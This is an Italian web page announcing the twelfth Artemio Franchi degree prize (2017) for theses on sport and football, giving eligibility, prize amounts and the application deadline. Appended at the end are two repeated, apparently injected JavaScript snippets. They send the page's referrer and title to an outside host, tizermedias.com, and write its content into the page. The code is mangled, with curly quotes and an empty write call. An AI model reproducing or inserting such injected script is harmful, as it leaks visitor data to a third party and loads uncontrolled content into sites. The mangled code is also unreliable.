Premio di laurea Artemio Franchi 2017

La Fondazione Artemio Franchi, in collaborazione con l’Università degli Studi di Firenze, bandisce l’edizione numero XII del premio di laurea Artemio Franchi da assegnare alla migliore tesi di laurea sullo sport. Il premio ha il patrocinio e la partecipazione della Lega Italiana Calcio Professionistico.

A chi è rivolto

Il premio di laurea Artemio Franchi 2017 è rivolto a laureati con titolo magistrale o specialistico conseguito presso qualsiasi ateneo italiano dopo il 1° gennaio 2013 che abbiano discusso una tesi incentrata sulle società sportive e l’attività sportiva in generale in ottica giuridica, sociale, economica e di medicina sportiva, con riferimento particolare alle problematiche del settore calcio.

L’importo

Il premio di laurea Artemio Franchi 2017 prevede l’assegnazione di un riconoscimento del valore di euro 5.000 al primo classificato, euro 4.000 per il secondo classificato ed euro 3.000 per il terzo classificato.

I requisiti

Per candidarsi al premio di laurea Artemio Franchi 2017 bisogna essere in possesso dei seguenti requisiti:

  • titolo di laurea magistrale o specialistica conseguita presso qualsiasi ateneo italiano;
  • laurea conseguita dopo il 1° gennaio 2013;
  • aver discusso una tesi incentrata sulle società sportive e l’attività sportiva in generale da un punto di vista giuridico, sociale, economico e medico-sportivo;
  • verrà data particolare rilevanza alle tesi che avranno approfondito le problematiche del settore calcio.

Come e quando presentare domanda

Per candidarsi al premio di laurea Artemio Franchi 2017 bisogna compilare la domanda di partecipazione, scaricabile da questa pagina, e registrarsi sul sito allegando la documentazione richiesta entro il 31 luglio 2017.

Bando premio di laurea Artemio Franchi 2017(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();